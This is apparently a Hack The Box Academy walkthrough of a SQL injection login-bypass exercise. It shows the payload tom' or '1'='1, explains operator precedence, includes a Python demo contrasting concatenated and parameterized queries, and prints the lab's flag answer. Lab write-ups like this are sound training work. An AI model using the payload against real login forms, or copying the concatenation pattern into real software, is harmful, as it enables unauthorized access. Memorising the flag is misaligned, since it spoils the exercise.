Subverting Query Logic — SQL Injection Fundamentals — HTB Academy Walkthrough
TIER 0 MODULE: SQL INJECTION FUNDAMENTALS
SECTION: Subverting Query Logic
Please open your Pwnbox or connect to the VPN in order to complete the tasks.
1. Try to log in as the user ‘tom’. What is the flag value shown after you successfully log in?
When we visit the target IP in the browser, we see an authentication portal where we have to successfully log in as tom.
But the great thing is, it displays the whole SQL query when something is entered and submitted.
By analyzing the query we have to design an injection.
We inject the query as:
tom' or '1'='1
in the username field, which the application then builds into:
SELECT * FROM logins WHERE username='tom' or '1'='1' AND password = '';
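The '1'='1' condition is always true, but AND is evaluated before OR, so the WHERE clause reads as username='tom' or ('1'='1' AND password = ''). The OR is satisfied for tom's row by username='tom', so at least one condition is true and it allowed us access.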
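The query above can be reproduced offline to see why only tom's row comes back and how binding the input as a parameter removes the problem. This is an added example, not code from the HTB module or the target application: it assumes a Python sqlite3 stand-in for the portal's database, with constructed rows and hypothetical function names.

```python
import sqlite3

# Constructed sample data: the table and column names come from the query
# shown on the page; the rows and passwords are made up for this example.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE logins (username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO logins VALUES (?, ?)",
        [("admin", "constructed-admin-pw"), ("tom", "constructed-tom-pw")],
    )
    return db

def login_concatenated(db, username, password):
    """Vulnerable: user input is pasted into the SQL text, as on the portal."""
    query = (
        "SELECT * FROM logins WHERE username='" + username
        + "' AND password = '" + password + "';"
    )
    return query, [row[0] for row in db.execute(query)]

def login_parameterized(db, username, password):
    """Hardened: input is bound as data and is never parsed as SQL."""
    query = "SELECT * FROM logins WHERE username = ? AND password = ?"
    return [row[0] for row in db.execute(query, (username, password))]

def explicit_grouping(db):
    """The injected WHERE clause with the implicit AND-before-OR grouping written out."""
    query = ("SELECT username FROM logins "
             "WHERE username='tom' or ('1'='1' AND password = '')")
    return [row[0] for row in db.execute(query)]

if __name__ == "__main__":
    db = make_db()
    payload = "tom' or '1'='1"  # the input shown on the page
    query, users = login_concatenated(db, payload, "")
    print(query)
    print("concatenated :", users)                 # only tom's row matches
    print("grouped      :", explicit_grouping(db)) # same result, grouping explicit
    print("parameterized:", login_parameterized(db, payload, ""))  # no rows
```

The admin row is not returned by the concatenated query, which shows that the match comes from username='tom' and not from '1'='1' alone.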
Answer: 202a1d1a8b195d5e9a57e434cc16000c
☣️ HAPPY ETHICAL HACKING ☣️
DISCLAIMER: THIS CONTENT DOES NOT BELONG TO ME, I AM JUST WRITING A WALK-THROUGH OF A FREE MODULE OF HACK THE BOX ACADEMY. (WRITING WALKTHROUGHS OF FREE MODULES IS PERMITTED BY HTB ACADEMY)